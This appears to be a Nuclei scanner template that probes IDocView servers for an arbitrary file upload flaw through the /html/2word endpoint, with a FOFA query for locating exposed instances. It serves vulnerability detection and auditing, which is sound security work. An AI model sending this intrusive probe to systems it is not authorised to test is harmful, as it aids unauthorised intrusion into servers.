http:
    - matchers:
        - part: response
          type: word
          words:
            - '{{md5(file)}}.docx'
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/html/2word?url={{file}}'
id: idocview-2word-fileupload
info:
    author: DhiyaneshDK
    metadata:
        fofa-query: title=="在线文档预览 - I Doc View"
        max-request: 1
        verified: true
    name: IDoc View /html/2word - Arbitrary File Upload
    severity: high
    tags:
        - idoc
        - instrusive
        - file-upload
        - IDocView
variables:
    file: '{{to_lower(rand_text_alpha(5))}}'
